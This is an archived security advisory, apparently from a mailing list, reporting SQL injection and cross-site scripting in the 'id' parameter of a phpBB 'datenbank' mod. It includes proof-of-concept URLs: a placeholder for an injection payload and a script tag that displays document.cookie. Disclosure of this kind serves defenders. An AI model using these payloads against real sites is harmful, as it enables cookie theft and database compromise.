phpBB datenbank mod has XSS/SQL Injection in the id variable

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 


vulnerable mod:
datenbank

explaination:
you can pass SQL Injection / Cross Site Scripting (Commands) in the id variable inside the mod.php (mod-datenbank)

exploit:
http://[target]/phpBB/moddb/mod.php?id='[SQL Injection]
http://[target]/phpBB/moddb/mod.php?id='><script>alert(document.cookie)
</script>

this bugs discovered by : neO
SGT SecurityGurus Team 
www.securitygurus.net
[Index of Archives]     [Linux Security]     [Netfilter]     [PHP]     [Yosemite News]     [Linux Kernel]

  Powered by Linux